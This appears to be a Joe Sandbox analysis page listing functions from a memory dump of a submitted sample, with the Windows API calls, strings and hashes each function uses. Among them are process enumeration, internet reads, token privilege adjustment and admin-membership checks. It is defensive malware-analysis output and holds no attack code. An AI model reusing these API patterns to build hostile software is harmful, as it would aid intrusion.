Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: cdb5c5f84761c704a59568a207038bbb1f0b297802a92504e17688805b670942
Instruction ID: db55e488c00ea5ce46104be45ec34e7dce1a7f0e438d3c71556770bb11f70a67
Opcode Fuzzy Hash: cdb5c5f84761c704a59568a207038bbb1f0b297802a92504e17688805b670942
Instruction Fuzzy Hash: 4BA13971108205AFD700EF64C891EAFB7ECEF8A354F00492DF155871A2EB71EA49DB62

Function 00C14B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C14AD0), ref: 00C14B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C14B57

Strings

GetNativeSystemInfo, xrefs: 00C14B51
kernel32.dll, xrefs: 00C14B40

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 5de7587896e9a3bb1b40bec1e52894a93895a72e1e36ea30f48f3622371460a1
Instruction ID: 467433ddcddb43d5d12a5ab241ff1ea7b92f8faf38bd3e16a0a4d0c4ef51cd1b
Opcode Fuzzy Hash: 5de7587896e9a3bb1b40bec1e52894a93895a72e1e36ea30f48f3622371460a1
Instruction Fuzzy Hash: 90D05B75A10713CFDB209F31EC1CB4A76E4AF06351B15C83ED495D6150D770D4C1C654

Function 00C23030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 07b6509049ee96ff5aab5f756e05bc7106c557b9d929872c2b66ed4c616f1c41
Instruction ID: 28faf56152c12a6c3a43d4fa97f573096a5d8bcc3fe2d6c3a8ad7f35c6960c31
Opcode Fuzzy Hash: 07b6509049ee96ff5aab5f756e05bc7106c557b9d929872c2b66ed4c616f1c41
Instruction Fuzzy Hash: 9E22DE716083509FC724EF14D891BAFB7E4EF85300F40492DF89A97291DB74EA89DB92

Function 00C8EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C8EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 00C8EE4B

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

Process32NextW.KERNEL32(00000000,?), ref: 00C8EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C8EF1A

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: ee5ae1891d3483e0c9091010bc592878c023bf3a3bbe8865551dcd9321a5b54c
Instruction ID: ffff89db88d2ed6d9351d78d1604a5f53796d8163a6063bb9a71b03a4003441c
Opcode Fuzzy Hash: ee5ae1891d3483e0c9091010bc592878c023bf3a3bbe8865551dcd9321a5b54c
Instruction Fuzzy Hash: 77519D71508301AFD310EF20DC85EAFB7E8EF99704F00492DF595962A1EB30E949EB92

Function 00C1FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 7b9796eb140ff463d8681e67673a48e8495f24dd3e5807b4fb2d6122fa0074fb
Instruction ID: 8ec83816773ea3a7c401f47d3bc0e6bc01f1944faf58be5f7ea98137422a83b5
Opcode Fuzzy Hash: 7b9796eb140ff463d8681e67673a48e8495f24dd3e5807b4fb2d6122fa0074fb
Instruction Fuzzy Hash: A5928C746083518FD724DF14C480B6AB7E1BF85304F24892EF89A8B762D771ED89DB92

Function 00C6E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C6E628

Strings

(, xrefs: 00C6E66E
|, xrefs: 00C6E658

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: b5708f33918368392aebc6866dc8b0601fb9c5ef682fdc56652e07afb0950797
Instruction ID: f331bf1721dcd2f987d68694635aaf6e496811c44356d9c77c04c2b8a52fdfd9
Opcode Fuzzy Hash: b5708f33918368392aebc6866dc8b0601fb9c5ef682fdc56652e07afb0950797
Instruction Fuzzy Hash: 94322679A007059FDB28CF59C48196AB7F1FF48310B15C56EE8AADB3A1E770E941CB44

Function 00C822EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C8180A,00000000), ref: 00C823E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C82418

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: b8ea735339a5ae9e314ef359ccc9d221e2109bf8481e942e9bec809023acba40
Instruction ID: 3f8c57eabcf3d54fb7e8636271d3fc55b57f78343de2e05f1c381104f9e000ed
Opcode Fuzzy Hash: b8ea735339a5ae9e314ef359ccc9d221e2109bf8481e942e9bec809023acba40
Instruction Fuzzy Hash: 3541F871504209BFEB20EE95DC89FBFB7BCEB80318F10402EF651A7150DA759E41A768

Function 00C7B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C7B40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C7B465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C7B4B2

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: df7b43f5235fa8eb3d8722f635050ee484cc59204d6761af7691a888c5138bdc
Instruction ID: ca1a654c3f50efb31203003f85b3d8a172917858be0a96c3fe1e4fd90384c9c0
Opcode Fuzzy Hash: df7b43f5235fa8eb3d8722f635050ee484cc59204d6761af7691a888c5138bdc
Instruction Fuzzy Hash: 6B215C35A00508EFCB00EFA5D884BEDBBB8FF49310F1480AAE905EB361CB319956DB55

Function 00C687E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C6882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C68858
GetLastError.KERNEL32 ref: 00C68865

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 3e1f1b395d773da904b0b3b87bffa64cc201741141aab86ef227c593959a4b55
Instruction ID: 37dcf173fd9ceec79217a9cd9bf39346ed3ea90bd086863c223b0f0c05df18cb
Opcode Fuzzy Hash: 3e1f1b395d773da904b0b3b87bffa64cc201741141aab86ef227c593959a4b55
Instruction Fuzzy Hash: B3119DB2414204AFE728DFA4DCC5E2BB7ECEB04310B20862EE49583241EA70AC018B60

Function 00C6874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C68774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C6878B
FreeSid.ADVAPI32(?), ref: 00C6879B

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 385f274a6caacc0bea90430656ee5af46be9893a17fddc523cbdbab58d84b68e
Instruction ID: f28e4b98b37d7a5a2e2241620705b3e1fd9f606da5009e3e62da9b99390255a0
Opcode Fuzzy Hash: 385f274a6caacc0bea90430656ee5af46be9893a17fddc523cbdbab58d84b68e
Instruction Fuzzy Hash: 27F04975A1130CBFDF00DFF4DC89AAEBBBCEF08201F1045A9A901E2181E775AA048B50

Function 00C7C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C7C6FB
FindClose.KERNEL32(00000000), ref: 00C7C72B

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: fbb86a9003fb6e6e552e1e48e18276bfe773a1e24ccd62dd1bc2247758f96326
Instruction ID: 9f0ef7098e9b14a21ea97abda16e79106b9ecb60020cb2a0770aa9e0b03217f9
Opcode Fuzzy Hash: fbb86a9003fb6e6e552e1e48e18276bfe773a1e24ccd62dd1bc2247758f96326
Instruction Fuzzy Hash: A51182716006009FDB10DF29D895A6AF7E8FF45320F00C51EF9A9C7290DB30A901DB81

Function 00C7A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C89468,?,00C9FB84,?), ref: 00C7A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C89468,?,00C9FB84,?), ref: 00C7A0A9

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 3eba7cb92c9ae13c1d908b7b42dce76238b982d8c098c31174c01c4906a68247
Instruction ID: 09033ec05b4d62a47296a232bc5f4b218581a42e7ecc9a97bd68132cedff9a13
Opcode Fuzzy Hash: 3eba7cb92c9ae13c1d908b7b42dce76238b982d8c098c31174c01c4906a68247
Instruction Fuzzy Hash: 7CF0A03510522DBBDB21AFA4DC48FEE776CFF09361F00826AF919D7191DA309A40DBA1

Function 00C681CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C68309), ref: 00C681E0
CloseHandle.KERNEL32(?,?,00C68309), ref: 00C681F2

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 79e261c0a22d9eee1e4541c037b6266eda80356bc57b0e65d2aa984e13a6057e
Instruction ID: 8fd92dbd591bd7ea2568feee38d9ab12a7e3a21b546e2e2ca361c75b6a1108d1
Opcode Fuzzy Hash: 79e261c0a22d9eee1e4541c037b6266eda80356bc57b0e65d2aa984e13a6057e
Instruction Fuzzy Hash: 4EE0E672010510AFE7252B70FC09E7B77EDEF04310B24892DF4A5C4470DB629C91DB10

Function 00C3A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C38D57,?,?,?,00000001), ref: 00C3A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C3A163

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 494a222a0648cce14168f1330f0500f275f8d33183b26a94f5000dcd9c738b0e
Instruction ID: 2b1b7b08e841003e27d8b5c78594a10929d94d6b13a1f19c30996b8a74d39391
Opcode Fuzzy Hash: 494a222a0648cce14168f1330f0500f275f8d33183b26a94f5000dcd9c738b0e
Instruction Fuzzy Hash: 80B09231054208EBCA002BA1EC0DB8C3F68FB44BA2F404026F60DC4070CB6654A28A91

Function 00C1E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00C53E62

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: cadcca6ef024484817dfc497c5bd70387d295f8289a51fe7ebb403e2f6dcb76e
Instruction ID: 254260522050af9f86aeff8acf93622cf9f34de2331f6c31cad867b07ce0679b
Opcode Fuzzy Hash: cadcca6ef024484817dfc497c5bd70387d295f8289a51fe7ebb403e2f6dcb76e
Instruction Fuzzy Hash: 18A26975A00215CBCB24CF59C490AEEB7B1FF5A314F248069EC16AB351D771EE86EB90

Function 00C3F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6378527684d87364da35d07a80f82d3aa18cff836760715a603a6d9ce457831c
Instruction ID: 30ad15047e77e2c8119cdf5dfc68cc5dd2b7deab6a8151fa3570aa999d0499be
Opcode Fuzzy Hash: 6378527684d87364da35d07a80f82d3aa18cff836760715a603a6d9ce457831c
Instruction Fuzzy Hash: D732F471D69F014ED7279634DC32339A249AFB73D8F15DB3BE829B69A5EB28C5834100

Function 00C4242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85070980f6c0d752495fdff8d1882f73b0aa683463af42a2e9eaa9faa0ac510f
Instruction ID: d0e063603effe260ab662a8cbd86ee4851cdce71517b0896af7763837ac97024
Opcode Fuzzy Hash: 85070980f6c0d752495fdff8d1882f73b0aa683463af42a2e9eaa9faa0ac510f
Instruction Fuzzy Hash: DFB10131D2AF404DD7639639883133ABA5CAFBB2D9F91D71BFC2675D22EB2185838141

Function 00C78889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00C7889B

Part of subcall function 00C3520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C78F6E,00000000,?,?,?,?,00C7911F,00000000,?), ref: 00C35213
Part of subcall function 00C3520A: __aulldiv.LIBCMT ref: 00C35233

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: c2c7c8c75ff53594189dc86e4962b51866b7f1e69fb9c1a6ea6cb0ac475c9d24
Instruction ID: 8d9e2bfe0b86f434376931189b417db957195e87ff9c8c36d7d032c1a979cffe
Opcode Fuzzy Hash: c2c7c8c75ff53594189dc86e4962b51866b7f1e69fb9c1a6ea6cb0ac475c9d24
Instruction Fuzzy Hash: 1A21AF726356108BC729CF29D841B56B3E1EBA5321B688E6DD1F9CB2C0CA34A949CB54

Function 00C74C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C74C76

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

